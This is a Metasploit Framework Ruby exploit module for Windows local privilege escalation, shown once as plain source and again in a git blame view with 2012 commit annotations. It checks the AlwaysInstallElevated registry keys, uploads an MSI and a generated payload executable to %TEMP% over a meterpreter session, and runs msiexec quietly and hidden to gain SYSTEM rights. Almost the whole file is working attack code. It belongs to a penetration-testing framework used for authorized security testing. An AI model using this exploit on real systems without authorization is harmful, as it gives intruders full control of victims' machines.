metasploit-framework/modules/exploits/windows/local/always_install_elevated.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'

class Metasploit3 < Msf::Exploit::Local
	Rank = AverageRanking

	include Msf::Exploit::EXE
	include Msf::Post::Windows::Registry

	def initialize(info={})
		super(update_info(info, {
			'Name'          => 'Windows AlwaysInstallElevated MSI',
			'Description'    => %q{
				This module checks the AlwaysInstallElevated registry keys which
				dictate if .MSI files should be installed with elevated privileges
				(NT AUTHORITY\SYSTEM).

				The default MSI file is data/post/exec_payload.msi with the WiX source
				file under data/post/exec_payload_source/. This MSI	simply executes
				payload.exe within the same folder.

				The MSI may not execute succesfully successive times.
			},
			'License'       => MSF_LICENSE,
			'Author'        =>
				[
					'Ben Campbell',
					'Parvez Anwar' # discovery
				],
			'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
			'Platform'      => [ 'win' ],
			'SessionTypes'  => [ 'meterpreter' ],
			'DefaultOptions' =>
				{
					'WfsDelay' => 10,
					'EXITFUNC' => 'thread',
				},
			'Targets'       =>
				[
					[ 'Windows', { } ],
				],
			'References'    =>
				[
					[ 'URL', 'http://www.greyhathacker.net/?p=185' ],
					[ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],
					[ 'URL', 'http://wix.sourceforge.net'] ,
				],
			'DisclosureDate'=> 'Mar 18 2010',
			'DefaultTarget' => 0
		}))

		register_advanced_options([
			OptString.new('LOG_FILE', [false, 'Path to output MSI log file to.', nil]),
		], self.class)
	end

	def check
		install_elevated = "AlwaysInstallElevated"
		installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"
		hkcu = "HKEY_CURRENT_USER\\#{installer}"
		hklm = "HKEY_LOCAL_MACHINE\\#{installer}"

		local_machine_value = registry_getvaldata(hklm,install_elevated)

		if local_machine_value.nil?
			print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.")
			return Msf::Exploit::CheckCode::Safe
		elsif local_machine_value == 0
			print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
			return Msf::Exploit::CheckCode::Safe
		else
			print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
			current_user_value = registry_getvaldata(hkcu,install_elevated)

			if current_user_value.nil?
				print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")
				return Msf::Exploit::CheckCode::Safe
			elsif current_user_value == 0
				print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
				return Msf::Exploit::CheckCode::Safe
			else
				print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
				return Msf::Exploit::CheckCode::Vulnerable
			end
		end
	end

	def cleanup
		if @executed
			begin
				print_status("Deleting MSI...")
				session.fs.file.delete(@msi_destination)
			rescue Rex::Post::Meterpreter::RequestError => e
				print_error(e.to_s)
			end

			begin
				print_status("Deleting Payload...")
				session.fs.file.delete(@payload_destination)
			rescue Rex::Post::Meterpreter::RequestError => e
				print_error(e.to_s)
			end
		end
	end

	def exploit
		@executed = false
		if check == Msf::Exploit::CheckCode::Vulnerable
			@executed = true

			msi_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
			msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")

			# Upload MSI
			@msi_destination = "#{session.fs.file.expand_path("%TEMP%")}\\#{msi_filename}"
			print_status("Uploading the MSI to #{@msi_destination} ...")
			session.fs.file.upload_file(@msi_destination, msi_source)

			# Upload payload
			payload = generate_payload_exe
			@payload_destination = "#{session.fs.file.expand_path("%TEMP%")}\\payload.exe"
			print_status("Uploading the Payload to #{@payload_destination} ...")
			fd = client.fs.file.new(@payload_destination, "wb")
			fd.write(payload)
			fd.close

			# Execute MSI
			print_status("Executing MSI...")

			if datastore['LOG_FILE'].nil?
				logging = ""
			else
				logging = "/l* #{datastore['LOG_FILE']} "
			end

			cmd = "msiexec.exe #{logging}/quiet /passive /n /package #{@msi_destination}"
			vprint_status(cmd)
			session.sys.process.execute(cmd, nil, {'Hidden' => true})
		end
	end
end
Changed to Local Exploit 2012-11-22 10:26:23 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
			`##`

			`require 'msf/core'`
			`require 'rex'`
			`require 'msf/core/post/windows/registry'`

			`class Metasploit3 < Msf::Exploit::Local`
			`Rank = AverageRanking`

			`include Msf::Exploit::EXE`
			`include Msf::Post::Windows::Registry`

			`def initialize(info={})`
			`super(update_info(info, {`
			`'Name' => 'Windows AlwaysInstallElevated MSI',`
			`'Description' => %q{`
			`This module checks the AlwaysInstallElevated registry keys which`
			`dictate if .MSI files should be installed with elevated privileges`
			`(NT AUTHORITY\SYSTEM).`

			`The default MSI file is data/post/exec_payload.msi with the WiX source`
			`file under data/post/exec_payload_source/. This MSI simply executes`
			`payload.exe within the same folder.`

			`The MSI may not execute succesfully successive times.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Ben Campbell',`
			`'Parvez Anwar' # discovery`
			`],`
			`'Arch' => [ ARCH_X86, ARCH_X86_64 ],`
			`'Platform' => [ 'win' ],`
			`'SessionTypes' => [ 'meterpreter' ],`
			`'DefaultOptions' =>`
			`{`
			`'WfsDelay' => 10,`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Targets' =>`
			`[`
			`[ 'Windows', { } ],`
			`],`
			`'References' =>`
			`[`
			`[ 'URL', 'http://www.greyhathacker.net/?p=185' ],`
			`[ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],`
			`[ 'URL', 'http://wix.sourceforge.net'] ,`
			`],`
			`'DisclosureDate'=> 'Mar 18 2010',`
			`'DefaultTarget' => 0`
			`}))`

			`register_advanced_options([`
			`OptString.new('LOG_FILE', [false, 'Path to output MSI log file to.', nil]),`
			`], self.class)`
			`end`
Cleanup s 2012-11-22 10:34:05 +00:00
Changed to Local Exploit 2012-11-22 10:26:23 +00:00			`def check`
			`install_elevated = "AlwaysInstallElevated"`
			`installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"`
			`hkcu = "HKEY_CURRENT_USER\\#{installer}"`
			`hklm = "HKEY_LOCAL_MACHINE\\#{installer}"`

			`local_machine_value = registry_getvaldata(hklm,install_elevated)`

			`if local_machine_value.nil?`
			`print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.")`
			`return Msf::Exploit::CheckCode::Safe`
			`elsif local_machine_value == 0`
			`print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.")`
			`return Msf::Exploit::CheckCode::Safe`
			`else`
			`print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")`
			`current_user_value = registry_getvaldata(hkcu,install_elevated)`

			`if current_user_value.nil?`
			`print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")`
			`return Msf::Exploit::CheckCode::Safe`
			`elsif current_user_value == 0`
			`print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")`
			`return Msf::Exploit::CheckCode::Safe`
			`else`
			`print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")`
			`return Msf::Exploit::CheckCode::Vulnerable`
			`end`
			`end`
			`end`

			`def cleanup`
			`if @executed`
			`begin`
			`print_status("Deleting MSI...")`
			`session.fs.file.delete(@msi_destination)`
			`rescue Rex::Post::Meterpreter::RequestError => e`
			`print_error(e.to_s)`
			`end`

			`begin`
			`print_status("Deleting Payload...")`
			`session.fs.file.delete(@payload_destination)`
			`rescue Rex::Post::Meterpreter::RequestError => e`
			`print_error(e.to_s)`
			`end`
			`end`
			`end`

			`def exploit`
			`@executed = false`
			`if check == Msf::Exploit::CheckCode::Vulnerable`
			`@executed = true`

			`msi_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"`
Move MSI source and binary location 2012-11-27 18:12:49 +00:00			`msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")`
Changed to Local Exploit 2012-11-22 10:26:23 +00:00
			`# Upload MSI`
			`@msi_destination = "#{session.fs.file.expand_path("%TEMP%")}\\#{msi_filename}"`
			`print_status("Uploading the MSI to #{@msi_destination} ...")`
			`session.fs.file.upload_file(@msi_destination, msi_source)`

			`# Upload payload`
			`payload = generate_payload_exe`
			`@payload_destination = "#{session.fs.file.expand_path("%TEMP%")}\\payload.exe"`
			`print_status("Uploading the Payload to #{@payload_destination} ...")`
			`fd = client.fs.file.new(@payload_destination, "wb")`
			`fd.write(payload)`
			`fd.close`

			`# Execute MSI`
			`print_status("Executing MSI...")`

			`if datastore['LOG_FILE'].nil?`
			`logging = ""`
			`else`
			`logging = "/l* #{datastore['LOG_FILE']} "`
			`end`

			`cmd = "msiexec.exe #{logging}/quiet /passive /n /package #{@msi_destination}"`
			`vprint_status(cmd)`
			`session.sys.process.execute(cmd, nil, {'Hidden' => true})`
			`end`
			`end`
			`end`